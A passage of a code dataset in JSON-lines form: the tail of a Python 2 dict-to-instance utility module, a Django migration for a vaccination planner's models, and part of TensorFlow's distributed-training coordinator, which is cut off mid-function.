copy,importlib,json,os,sys\n\n#############################\n#############################\n###Set Path to the Settings\nRootSettingsPathSlashString=\"/Users/erwanledoux/Documents/Researchs/\";\nLibPathSlashString=json.load(open(RootSettingsPathSlashString+'RootSettings.json','r'))['PathSlashStrings']['Lib'];\n\n#############################\n#############################\n###Build the Basic Module Installer Method\ndef importModulesFromFolderNames(FolderNames=[]):\n\tLibPathSlashString=json.load(open(RootSettingsPathSlashString+'RootSettings.json','r'))['PathSlashStrings']['Lib']\n\tfor FolderName in FolderNames:\n\t\tFolderPathSlahString=LibPathSlashString+FolderName;\n\t\tModuleName='Py'+FolderName;\n\t\tif (FolderPathSlahString in sys.path)==False:\n\t\t\tsys.path.append(FolderPathSlahString);\n\t\t\timportlib.import_module(ModuleName);\n\n#############################\n#############################\n###PySetterClass Definition\n\n#set the BaseFolderNames\ndef getBaseFolderNames():\n\treturn [];\n\n#Class definition\nclass PySetterClass():\n\n\t####__init__\n\t#\n\tdef __init__(self,**Kwargs):\n\t\t#init Bases\n\t\tinitBases(**{\n\t\t\t\t\t\t'BaseFolderNames':getBaseFolderNames(),\n\t\t\t\t\t\t'Instance':self,\n\t\t\t\t\t\t'InitDictKwargs':Kwargs\n\t\t\t\t\t});\n\t\t\t\t\n\t##general set Method\n\tdef __setitem__(self,Key,Value):\n\t\tself.__dict__[Key]=Value;\n\t\n\t##set the __dict__\n\tdef update(self,Dict):\n\t\t####NEED TO PARSE !!!!#####\n\t\tself.__dict__.update(Dict);\n\n\t##set at a certain PathList\n\tdef setAtPathList(self,**Kwargs):\n\t\t##set possible default Kwargs\n\t\tKwargsOrDefault=getFromKwargsOrDefaultSkeleton(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['Root',self],\n\t\t\t\t\t\t['PathList',[]],\n\t\t\t\t\t\t['AttributeKey',None],\n\t\t\t\t\t\t['AttributeValue',0]\n\t\t\t\t\t ]\n\t\t\t\t\t });\n\t\t\t\t\t \n\t\t##get the SettedObject\n\t\tSettedObject=reduce(getFromPathList,KwargsOrDefault['PathList'],KwargsOrDefault['Root']);\n\t\t\n\t\tif SettedObject!=None:\n\t\t\t\n\t\t\t##if the PathList has a minimal path\n\t\t\tif KwargsOrDefault['AttributeKey']!=None:\n\t\t\t\t##set the SettedObject\n\t\t\t\tif isDictOrInstance(SettedObject) and type(KwargsOrDefault['AttributeKey']) in [str,unicode]:\n\t\t\t\t\tSettedObject[KwargsOrDefault['AttributeKey']]=KwargsOrDefault['AttributeValue'];\n\t\t\t\telif type(SettedObject)==list and type(KwargsOrDefault['AttributeKey'])==int:\n\t\t\t\t\tSettedObject[KwargsOrDefault['AttributeKey']]=KwargsOrDefault['AttributeValue'];\n\t\t\t\n\t\t\t##else update directly the __dict__\n\t\t\telse:\n\t\t\t\tSettedObject.update(KwargsOrDefault['AttributeValue']);\n\n\n#############################\n#############################\n###PySetter Static Methods\n\n###Filter Kwargs with Default possible Values\ndef getFromKwargsOrDefaultItems(**Kwargs):\n\t##init skeleotn\n\tKwargsOrDefaultSkeleton={};\n\t\n\t##accumulate Kwargs\n\tfor Key,DefaultValue in Kwargs['DefaultItems']:\n\t\tKwargsOrDefaultSkeleton[Key]=Kwargs['Kwargs'][Key] if Kwargs['Kwargs'].has_key(Key) else DefaultValue;\n\n\t##return\n\treturn KwargsOrDefaultSkeleton;\n\n\n##add items to the __dict__ from another dict with the rule of adding values in each containers\ndef sumDicts(DictA={},DictB={},**Kwargs):\n\t##set possible default Kwargs\n\tKwargsOrDefault=sys.modules['PySetter'].getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['IsOverWrite',True],\n\t\t\t\t\t ]\n\t\t\t\t\t });\n\t##parse the Values and update or add if 
conditions are satisfied\n\tfor Key,Value in DictB.items():\n\t\t#special case of Contents Tag ListType...have to parse inside if there are same ID children...\n\t\tif Key=='Contents':\n\t\t\tif hasKeyAttr(DictA,'Contents'):\n\t\t\t\t#sub case where the types are the same\n\t\t\t\tif type(DictA[Key])==type(Value):\n\t\t\t\t\t#list case\n\t\t\t\t\tif type(Value)==list:\n\t\t\t\t\t\tfor ChildIdx in xrange(len(Value)):\n\t\t\t\t\t\t\t#set the Child\n\t\t\t\t\t\t\tChild=Value[ChildIdx];\n\t\t\t\t\t\t\tprint(Child)\n\t\t\t\t\t\t\t#dict or __dict__ subcase\n\t\t\t\t\t\t\tif isDictOrInstance(Child):\n\t\t\t\t\t\t\t\tif hasKeyAttr(Child,'Attributes'):\n\t\t\t\t\t\t\t\t\tif hasKeyAttr(Child['Attributes'],'ID'):\n\t\t\t\t\t\t\t\t\t\tif all(map(lambda Dict:hasKeyAttr(Dict,'Attributes'),DictA[Key])):\n\t\t\t\t\t\t\t\t\t\t\tif all(map(lambda Dict:hasKeyAttr(Dict['Attributes'],'ID'),DictA[Key])):\n\t\t\t\t\t\t\t\t\t\t\t\tif getFromDictOrInstance(getFromDictOrInstance(Child,'Attributes'),'ID') in map(lambda Dict:getFromDictOrInstance(getFromDictOrInstance(Dict,'Attributes'),'ID'),DictA[Key]):\n\t\t\t\t\t\t\t\t\t\t\t\t\t#recursive call of sumDicts\n\t\t\t\t\t\t\t\t\t\t\t\t\tDictA[Key][ChildIdx]=sumDicts(DictA[Key][ChildIdx],Child,**Kwargs);\n\t\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\t\t#add the new Children\n\t\t\t\t\t\t\t\t\t\t\t\t\tDictA[Key]+=[Child];\n\t\t\t\t\t#dict or __dict__ case\n\t\t\t\t\telif isDictOrInstance(Value):\n\t\t\t\t\t\t#recursive call\n\t\t\t\t\t\tDictA[Key]=sumDicts(DictA[Key],Value,**Kwargs);\n\t\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t\tDictA[Key]=Value;\n\t\t#for the other keys : parse for dict or __dict__ or overwrite\n\t\telse:\n\t\t\tif hasKeyAttr(DictA,Key):\n\t\t\t\t#sub case where the types are the same\n\t\t\t\tif type(DictA[Key])==type(Value):\n\t\t\t\t\tif isDictOrInstance(Value):\n\t\t\t\t\t\t#recursive call of sumDicts\n\t\t\t\t\t\tDictA[Key]=sumDicts(DictA[Key],Value,**Kwargs);\n\t\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t\tDictA[Key]=Value;\n\t\t\t\telif KwargsOrDefault['IsOverWrite']:\n\t\t\t\t\t#change the type...\n\t\t\t\t\tDictA[Key]=Value;\n\t\t\telse:\n\t\t\t\t#just update either\n\t\t\t\tDictA[Key]=Value;\n\t\t\t\t\n\t#return the DictA\n\treturn DictA;\n\n\n###Instance Getter with a Dict that will be the __dict__\ndef getInstance(**Kwargs):\n\t\t\t\t\n\t#set possible default Kwargs\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t[\n\t\t\t\t\t['Dict',{}],\n\t\t\t\t\t['FolderName',\"Default\"],\n\t\t\t\t\t['ModuleName',\"Py\"+Kwargs['FolderName'] if Kwargs.has_key('FolderName') else \"PyDefault\"],\n\t\t\t\t\t['ClassName',\"Py\"+Kwargs['FolderName']+\"Class\" if Kwargs.has_key('FolderName') else \"PyDefaultClass\"],\n\t\t\t\t ]\n\t\t\t\t });\n\tif type(KwargsOrDefault['Dict'])==dict:\n\t\tif KwargsOrDefault['FolderName']!=None:\n\t\t\t#look if maybe there is a Class with this Name in the lib\n\t\t\tDirSlashPath=LibPathSlashString+KwargsOrDefault['FolderName'];\n\t\t\tif os.path.isdir(DirSlashPath):\n\t\t\t\tsys.path.append(LibPathSlashString+KwargsOrDefault['FolderName']);\n\t\t\t\timportlib.import_module(KwargsOrDefault['ModuleName']);\n\t\t\t\tif sys.modules.has_key(KwargsOrDefault['ModuleName']):\n\t\t\t\t\t#add this Base\n\t\t\t\t\tif 
hasattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName']):\n\t\t\t\t\t\tInstance=getattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName'])();\n\t\t\t\t\t\tsys.modules['PySetter'].addDict(DictA=Instance.__dict__,DictB=KwargsOrDefault['Dict']);\n\t\t\t\t\t\treturn Instance;\n\t\t#if there is not a specify Class for this, just return a default one or a Dict\n\t\t#class PyLocalDefaultClass():pass;\n\t\t#Instance=PyLocalDefaultClass();\n\t\t#Instance.__dict__.update(Kwargs['Dict']);\n\t\t#return Instance;\n\t\treturn KwargsOrDefault['Dict'];\n\n\n###add a class base (and the bases of the base) to a class through an already instancified object of it + call the initDict Method for each new installed base\ndef initBase(**Kwargs):\n\t#default settings\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['Instance',[]],\n\t\t\t\t\t\t['FolderName',\"Default\"],\n\t\t\t\t\t\t['ModuleName',\"Py\"+Kwargs['FolderName'] if Kwargs.has_key('FolderName') else \"PyDefault\"],\n\t\t\t\t\t\t['ClassName',\"Py\"+Kwargs['FolderName']+\"Class\" if Kwargs.has_key('FolderName') else \"PyDefaultClass\"],\n\t\t\t\t\t\t['InitDictKwargs',{}]\n\t\t\t\t\t ]\n\t\t});\n\t\t\n\tif hasattr(KwargsOrDefault['Instance'],'__class__'):\n\t\t#look if maybe there is a Class with this Name in the lib\n\t\tDirSlashPath=LibPathSlashString+KwargsOrDefault['FolderName'];\n\t\tif os.path.isdir(DirSlashPath):\n\t\t\tsys.path.append(LibPathSlashString+KwargsOrDefault['FolderName']);\n\t\t\t#check tha a module exists here\n\t\t\timportlib.import_module(KwargsOrDefault['ModuleName']);\n\t\t\tif sys.modules.has_key(KwargsOrDefault['ModuleName']):\n\t\t\t\t#add this Base if it exists a defined Class in the module\n\t\t\t\tif hasattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName']):\n\t\t\t\t\t#don't add if there is already one that is in the bases set of the Instance\n\t\t\t\t\tif (KwargsOrDefault['ClassName'] in map(lambda PythonBase:getattr(PythonBase,'__name__'),KwargsOrDefault['Instance'].__class__.__bases__))==False:\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\t#get the bases dependencies of this new base if there are\n\t\t\t\t\t\tif hasattr(sys.modules[KwargsOrDefault['ModuleName']],'getBaseFolderNames'):\n\t\t\t\t\t\t\tinitBases(**{\n\t\t\t\t\t\t\t\t\t\t\t'Instance':KwargsOrDefault['Instance'],\n\t\t\t\t\t\t\t\t\t\t\t'BaseFolderNames':sys.modules[KwargsOrDefault['ModuleName']].getBaseFolderNames(),\n\t\t\t\t\t\t\t\t\t\t\t'InitDictKwargs':KwargsOrDefault['InitDictKwargs']\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t\t);\n\t\t\t\t\t\n\t\t\t\t\t\t#add the Base\n\t\t\t\t\t\tKwargsOrDefault['Instance'].__class__.__bases__=tuple(list(KwargsOrDefault['Instance'].__class__.__bases__)+[getattr(sys.modules[KwargsOrDefault['ModuleName']],KwargsOrDefault['ClassName'])]);\n\n\t\t\t\t\t\t#do the Init Dict Method\n\t\t\t\t\t\tif hasattr(Kwargs['Instance'],'initPy'+KwargsOrDefault['FolderName']+'Dict'):\n\t\t\t\t\t\t\tgetattr(Kwargs['Instance'],'initPy'+KwargsOrDefault['FolderName']+'Dict')(**KwargsOrDefault['InitDictKwargs']);\n\n\n### addBases from several FolderNames and init their each __dict__\ndef initBases(**Kwargs):\n\t#default settings\n\tKwargsOrDefault=getFromKwargsOrDefaultItems(**{'Kwargs':Kwargs,'DefaultItems':\n\t\t\t\t\t[\n\t\t\t\t\t\t['BaseFolderNames',[]],\n\t\t\t\t\t\t['InitDictKwargs',{}]\n\t\t\t\t\t ]\n\t\t});\n\t\n\t#add Bases and set their Dict\n\tfor BaseFolderName in 
KwargsOrDefault['BaseFolderNames']:\n\t\t\n\t\t#add to the __class__.__bases__\n\t\tinitBase(**{\n\t\t\t\t\t\t'Instance':Kwargs['Instance'],\n\t\t\t\t\t\t'FolderName':BaseFolderName\n\t\t\t\t\t}\n\t\t\t\t);\n\n####get by avoiding an error if the Key doesn't exist\ndef getFromPathList(Parent,Child):\n\tif hasattr(Parent,Child):\n\t\treturn getattr(Parent,Child);\n\telse:\n\t\treturn None;\n\n####say if it has a dict whatever it is a dict or an instance:\ndef isDictOrInstance(DictOrInstance=\"None\"):\n\treturn hasattr(DictOrInstance,'__dict__') or type(DictOrInstance)==dict;\n\n####say if it has this keyAttr whatever it is a Dict or an instance\ndef hasKeyAttr(DictOrInstance,KeyAttr):\n\t#dict case\n\tif type(DictOrInstance)==dict:\n\t\treturn DictOrInstance.has_key(KeyAttr);\n\t#object instance case\n\telse:\n\t\treturn hasattr(DictOrInstance,KeyAttr);\n\n####get the Value from a dict or a __dict__\ndef getFromDictOrInstance(DictOrInstance,Key):\n\tif type(DictOrInstance)==dict:\n\t\treturn DictOrInstance[Key];\n\telif hasattr(DictOrInstance,'__dict__'):\n\t\treturn DictOrInstance.__dict__[Key];\n\n","sub_path":"lib/Setter/PySetter.py","file_name":"PySetter.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333963180","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BaseImmu',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('sign', models.CharField(max_length=50)),\n ('offset', models.DurationField()),\n ('predecessor', models.ForeignKey(to='planer.BaseImmu')),\n ],\n ),\n migrations.CreateModel(\n name='Disease',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('baseImmus', models.ManyToManyField(to='planer.BaseImmu')),\n ],\n ),\n migrations.CreateModel(\n name='Person',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('firstName', models.CharField(max_length=50)),\n ('lastName', models.CharField(max_length=50)),\n ('dateOfBirth', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='Vaccine',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('coveredDiseases', models.ManyToManyField(to='planer.Disease')),\n ],\n ),\n migrations.CreateModel(\n name='Visit',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('date', models.DateField()),\n ('appliedVaccines', models.ManyToManyField(to='planer.Vaccine')),\n ],\n ),\n ]\n","sub_path":"planer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"385607970","text":"# Copyright 2018 The TensorFlow Authors. 
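# --- Hedged sketch (not part of PySetter): the initBase() helper above
# retrofits mixins by assigning to __class__.__bases__. A minimal,
# self-contained illustration of that technique; all names below are
# hypothetical. Note that CPython rejects this assignment when the only
# base is `object`, which is why a dummy root class is introduced here.
class _Root(object):
    pass

class _Mixin(object):
    def greet(self):
        return "hello from mixin"

class _Plain(_Root):
    pass

obj = _Plain()
# Existing instances pick up the mixin too: lookup walks the (new) MRO.
_Plain.__bases__ = tuple(list(_Plain.__bases__) + [_Mixin])
assert obj.greet() == "hello from mixin"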
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"A component for running distributed TensorFlow.\"\"\"\n\nimport copy\nimport json\nimport os\nimport threading\nimport time\n\nfrom tensorflow.core.protobuf import config_pb2\nfrom tensorflow.python.client import session\nfrom tensorflow.python.distribute import distribute_coordinator_context\nfrom tensorflow.python.distribute import multi_worker_util\nfrom tensorflow.python.platform import tf_logging as logging\nfrom tensorflow.python.training import coordinator\nfrom tensorflow.python.training import monitored_session\nfrom tensorflow.python.training import server_lib\n\n\n_thread_local = threading.local()\n\n\nclass _TaskType(object):\n PS = \"ps\"\n WORKER = \"worker\"\n CHIEF = \"chief\"\n EVALUATOR = \"evaluator\"\n CLIENT = \"client\"\n\n\n# TODO(yuefengz): support another mode where the client colocates with one\n# worker.\nclass CoordinatorMode(object):\n \"\"\"Specify how distribute coordinator runs.\"\"\"\n # The default mode where distribute coordinator will run as a standalone\n # client and connects to remote servers for training. Each remote server can\n # use the distribute coordinator binary with task_type set correctly which\n # will then turn into standard servers.\n STANDALONE_CLIENT = \"standalone_client\"\n\n # The distribute coordinator runs on each worker. It will run a standard\n # server on each worker and optionally run the `worker_fn` that is configured\n # to talk to its standard server.\n INDEPENDENT_WORKER = \"independent_worker\"\n\n\nclass _Barrier(object):\n \"\"\"A reusable barrier class for worker synchronization.\"\"\"\n\n def __init__(self, num_participants):\n \"\"\"Initializes the barrier object.\n\n Args:\n num_participants: an integer which is the expected number of calls of\n `wait` pass to through this barrier.\n \"\"\"\n self._num_participants = num_participants\n self._counter = 0\n self._flag = False\n self._local_sense = threading.local()\n self._lock = threading.Lock()\n self._condition = threading.Condition()\n\n def wait(self):\n \"\"\"Waits until all other callers reach the same wait call.\"\"\"\n self._local_sense.value = not self._flag\n with self._lock:\n self._counter += 1\n if self._counter == self._num_participants:\n self._counter = 0\n self._flag = self._local_sense.value\n with self._condition:\n while self._flag != self._local_sense.value:\n self._condition.wait()\n self._condition.notify_all()\n\n\ndef _get_num_workers(cluster_spec):\n \"\"\"Gets number of workers including chief.\"\"\"\n if not cluster_spec:\n return 0\n return len(cluster_spec.as_dict().get(_TaskType.WORKER, [])) + len(\n cluster_spec.as_dict().get(_TaskType.CHIEF, []))\n\n\nclass _WorkerContext(object):\n \"\"\"The worker context class.\n\n This context object provides configuration information for each task. 
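# --- Hedged usage sketch (illustrative only; assumes the _Barrier class
# defined above is in scope): three threads arrive at different times and
# none proceeds past wait() until all three have called it.
import threading
import time

def _demo_barrier():
    barrier = _Barrier(num_participants=3)
    released = []

    def work(i):
        time.sleep(0.01 * i)  # stagger arrival at the barrier
        barrier.wait()        # blocks until all three participants arrive
        released.append(i)

    threads = [threading.Thread(target=work, args=(i,)) for i in range(3)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    assert sorted(released) == [0, 1, 2]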
One\n context manager with a worker context object will be created per\n invocation to the `worker_fn` where `get_current_worker_context` can be called\n to access the worker context object.\n \"\"\"\n\n def __init__(self,\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config=None,\n rpc_layer=\"grpc\",\n worker_barrier=None):\n \"\"\"Initialize the worker context object.\n\n Args:\n strategy: a `DistributionStrategy` object.\n cluster_spec: a ClusterSpec object. It can be empty or None in the local\n training case.\n task_type: a string indicating the role of the corresponding task, such as\n \"worker\" or \"ps\". It can be None if it is local training or in-graph\n replicated training.\n task_id: an integer indicating id of the corresponding task. It can be\n None if it is local training or in-graph replicated training.\n session_config: an optional `tf.compat.v1.ConfigProto` object.\n rpc_layer: optional string specifying the RPC protocol for communication\n with worker masters. If None or empty, hosts in the `cluster_spec` will\n be used directly.\n worker_barrier: optional, the barrier object for worker synchronization.\n \"\"\"\n self._strategy = strategy\n self._cluster_spec = cluster_spec\n self._task_type = task_type\n self._task_id = task_id\n self._session_config = session_config\n self._worker_barrier = worker_barrier\n self._rpc_layer = rpc_layer\n self._master_target = self._get_master_target()\n self._num_workers = _get_num_workers(cluster_spec)\n self._is_chief_node = self._is_chief()\n\n def _debug_message(self):\n if self._cluster_spec:\n return \"[cluster_spec: %r, task_type: %r, task_id: %r]\" % (\n self._cluster_spec, self.task_type, self.task_id)\n else:\n return \"[local]\"\n\n def __enter__(self):\n old_context = distribute_coordinator_context.get_current_worker_context()\n if old_context:\n raise ValueError(\n \"You cannot run distribute coordinator in a `worker_fn`.\\t\" +\n self._debug_message())\n # pylint: disable=protected-access\n distribute_coordinator_context._worker_context.current = self\n\n def __exit__(self, unused_exception_type, unused_exception_value,\n unused_traceback):\n # pylint: disable=protected-access\n distribute_coordinator_context._worker_context.current = None\n\n def _get_master_target(self):\n \"\"\"Return the master target for a task.\"\"\"\n # If cluster_spec is None or empty, we use local master.\n if not self._cluster_spec or self._task_type == _TaskType.EVALUATOR:\n return \"\"\n\n # If task_type is None, then it is in-graph replicated training. 
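# --- Hedged sketch (names hypothetical, not TensorFlow API): __enter__ and
# __exit__ above publish the context through a thread-local slot, so callees
# can look up "the current worker context" without it being threaded through
# every call. The same pattern in miniature:
import threading

_current = threading.local()

class _Scope(object):
    def __init__(self, value):
        self._value = value

    def __enter__(self):
        if getattr(_current, "value", None) is not None:
            raise ValueError("scope already entered on this thread")
        _current.value = self._value
        return self._value

    def __exit__(self, *exc_info):
        _current.value = None

def current_scope():
    return getattr(_current, "value", None)

with _Scope("worker-0"):
    assert current_scope() == "worker-0"
assert current_scope() is None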
In this\n # case we use the chief or first worker's master target.\n if not self._task_type:\n if _TaskType.CHIEF in self._cluster_spec.jobs:\n task_type = _TaskType.CHIEF\n task_id = 0\n else:\n assert _TaskType.WORKER in self._cluster_spec.jobs\n task_type = _TaskType.WORKER\n task_id = 0\n else:\n task_type = self._task_type\n task_id = self._task_id\n\n prefix = \"\"\n if self._rpc_layer:\n prefix = self._rpc_layer + \"://\"\n return prefix + self._cluster_spec.job_tasks(task_type)[task_id or 0]\n\n def _is_chief(self):\n \"\"\"Return whether the task is the chief worker.\"\"\"\n if (not self._cluster_spec or\n self._task_type in [_TaskType.CHIEF, _TaskType.EVALUATOR, None]):\n return True\n\n # If not local and chief not in the cluster_spec, use the first worker as\n # chief.\n if (_TaskType.CHIEF not in self._cluster_spec.jobs and\n self._task_type == _TaskType.WORKER and self._task_id == 0):\n return True\n return False\n\n def wait_for_other_workers(self):\n \"\"\"Waits for other workers to reach the same call to this method.\n\n Raises:\n ValueError: if `worker_barrier` is not passed to the __init__ method.\n \"\"\"\n if not self._worker_barrier:\n # TODO(yuefengz): we should throw an error in independent worker mode.\n return\n self._worker_barrier.wait()\n\n def session_creator(self,\n scaffold=None,\n config=None,\n checkpoint_dir=None,\n checkpoint_filename_with_path=None,\n max_wait_secs=7200):\n \"\"\"Returns a session creator.\n\n The returned session creator will be configured with the correct master\n target and session configs. It will also run either init ops or ready ops\n by querying the `strategy` object when `create_session` is called on it.\n\n Args:\n scaffold: A `Scaffold` used for gathering or building supportive ops. If\n not specified a default one is created. It's used to finalize the graph.\n config: `ConfigProto` proto used to configure the session.\n checkpoint_dir: A string. 
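# --- Hedged sketch of the config merge performed by session_creator(): the
# caller's ConfigProto is deep-copied and the context's config merged in, so
# neither input proto is mutated. The field choices are illustrative only.
import copy
from tensorflow.core.protobuf import config_pb2

caller_config = config_pb2.ConfigProto(log_device_placement=True)
context_config = config_pb2.ConfigProto(allow_soft_placement=True)
merged = copy.deepcopy(caller_config)
merged.MergeFrom(context_config)  # fields set on the context config win
assert merged.log_device_placement and merged.allow_soft_placement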
Optional path to a directory where to restore\n variables.\n checkpoint_filename_with_path: Full file name path to the checkpoint file.\n Only one of `checkpoint_dir` or `checkpoint_filename_with_path` can be\n specified.\n max_wait_secs: Maximum time to wait for the session to become available.\n\n Returns:\n a descendant of SessionCreator.\n \"\"\"\n if config:\n session_config = copy.deepcopy(config)\n session_config.MergeFrom(self._session_config)\n else:\n session_config = self._session_config\n\n if not self._strategy or self._strategy.extended.experimental_should_init:\n logging.info(\"Creating chief session creator with config: %r\", config)\n return monitored_session.ChiefSessionCreator(\n scaffold,\n master=self.master_target,\n config=session_config,\n checkpoint_dir=checkpoint_dir,\n checkpoint_filename_with_path=checkpoint_filename_with_path)\n else:\n logging.info(\"Creating worker session creator with config: %r\", config)\n return monitored_session.WorkerSessionCreator(\n scaffold,\n master=self.master_target,\n config=session_config,\n max_wait_secs=max_wait_secs)\n\n @property\n def session_config(self):\n return copy.deepcopy(self._session_config)\n\n @property\n def has_barrier(self):\n \"\"\"Whether the barrier is set or not.\"\"\"\n return self._worker_barrier is not None\n\n @property\n def distributed_mode(self):\n \"\"\"Whether it is distributed training or not.\"\"\"\n return bool(self._cluster_spec) and self._task_type != _TaskType.EVALUATOR\n\n @property\n def cluster_spec(self):\n \"\"\"Returns a copy of the cluster_spec object.\"\"\"\n return copy.deepcopy(self._cluster_spec)\n\n @property\n def task_type(self):\n \"\"\"Returns the role of the corresponding task.\"\"\"\n return self._task_type\n\n @property\n def task_id(self):\n \"\"\"Returns the id or index of the corresponding task.\"\"\"\n return self._task_id\n\n @property\n def master_target(self):\n \"\"\"Returns the session master for the corresponding task to connect to.\"\"\"\n return self._master_target\n\n @property\n def is_chief(self):\n \"\"\"Returns whether the task is a chief node.\"\"\"\n return self._is_chief_node\n\n @property\n def num_workers(self):\n \"\"\"Returns number of workers in the cluster, including chief.\"\"\"\n return self._num_workers\n\n @property\n def experimental_should_init(self):\n \"\"\"Whether to run init ops.\"\"\"\n return self._strategy.extended.experimental_should_init\n\n @property\n def should_checkpoint(self):\n \"\"\"Whether to save checkpoint.\"\"\"\n return self._strategy.extended.should_checkpoint\n\n @property\n def should_save_summary(self):\n \"\"\"Whether to save summaries.\"\"\"\n return self._strategy.extended.should_save_summary\n\n\ndef _run_single_worker(worker_fn,\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config,\n rpc_layer=\"\",\n worker_barrier=None,\n coord=None):\n \"\"\"Runs a single worker by calling `worker_fn` under context.\"\"\"\n session_config = copy.deepcopy(session_config)\n strategy = copy.deepcopy(strategy)\n # If there is an EVALUATOR task, we run single-machine eval on that task.\n if task_type == _TaskType.EVALUATOR:\n # It is possible to not have a strategy object for EVALUATOR task.\n if strategy:\n strategy.configure(session_config)\n else:\n assert strategy\n strategy.configure(session_config, cluster_spec, task_type, task_id)\n\n context = _WorkerContext(\n strategy,\n cluster_spec,\n task_type,\n task_id,\n session_config=session_config,\n rpc_layer=rpc_layer,\n worker_barrier=worker_barrier)\n with 
context:\n if coord:\n with coord.stop_on_exception():\n return worker_fn(strategy)\n else:\n return worker_fn(strategy)\n\n\ndef _split_cluster_for_evaluator(cluster_spec, task_type):\n \"\"\"Split the cluster for evaluator since it needn't talk to other tasks.\"\"\"\n # Splitting the cluster is important to prevent the evaluator from talking to\n # other tasks in the cluster. Since we allow evaluator not to use\n # distribution strategies and as a result ops in the evaluator task may have\n # unspecified devices. Those ops may end up on other tasks if we don't split\n # the cluster.\n # Note: if you bypass distribute coordinator and bring the cluster yourself,\n # you can equivalently set device filters to split clusters. This is already\n # done by distribution strategy's `update_config_proto` method.\n new_cluster_spec = multi_worker_util.normalize_cluster_spec(\n cluster_spec).as_dict()\n if task_type == _TaskType.EVALUATOR:\n assert _TaskType.EVALUATOR in new_cluster_spec\n new_cluster_spec = {\n _TaskType.EVALUATOR: new_cluster_spec[_TaskType.EVALUATOR]\n }\n else:\n new_cluster_spec.pop(_TaskType.EVALUATOR, None)\n return multi_worker_util.normalize_cluster_spec(new_cluster_spec)\n\n\ndef _run_std_server(cluster_spec=None,\n task_type=None,\n task_id=None,\n session_config=None,\n rpc_layer=None,\n environment=None):\n \"\"\"Runs a standard server.\"\"\"\n # Check if the Server is already running. If so, assert that no configuration\n # options have changed, and return the existing Server. This allows us to\n # call `run_distribute_coordinator` multiple times.\n if getattr(_thread_local, \"server\", None) is not None:\n assert _thread_local.cluster_spec == cluster_spec\n assert _thread_local.task_type == task_type\n assert _thread_local.task_id == task_id\n assert _thread_local.session_config_str == repr(session_config)\n assert _thread_local.rpc_layer == rpc_layer\n assert _thread_local.environment == environment\n return _thread_local.server\n else:\n # This method is not thread-safe.\n _thread_local.server_started = True\n _thread_local.cluster_spec = cluster_spec\n _thread_local.task_type = task_type\n _thread_local.task_id = task_id\n _thread_local.session_config_str = repr(session_config)\n _thread_local.rpc_layer = rpc_layer\n _thread_local.environment = environment\n\n assert cluster_spec\n target = cluster_spec.task_address(task_type, task_id)\n if rpc_layer:\n target = rpc_layer + \"://\" + target\n\n class _FakeServer(object):\n \"\"\"A fake server that runs a master session.\"\"\"\n\n def start(self):\n # A tensorflow server starts when a remote session is created.\n logging.info(\n \"Creating a remote session to start a TensorFlow server, \"\n \"target = %r, session_config=%r\", target, session_config)\n session.Session(target=target, config=session_config)\n\n def join(self):\n while True:\n time.sleep(5)\n\n if environment == \"google\":\n server = _FakeServer()\n else:\n if session_config:\n logging.info(\n \"Starting standard TensorFlow server, target = %r, session_config= \"\n \"%r\", target, session_config)\n else:\n logging.info(\"Starting standard TensorFlow server, target = %r\", target)\n cluster_spec = _split_cluster_for_evaluator(cluster_spec, task_type)\n server = server_lib.Server(\n cluster_spec,\n job_name=task_type,\n task_index=task_id,\n config=session_config,\n protocol=rpc_layer)\n\n server.start()\n _thread_local.server = server\n return server\n\n\ndef _run_between_graph_client(worker_fn, strategy, eval_fn, eval_strategy,\n cluster_spec, 
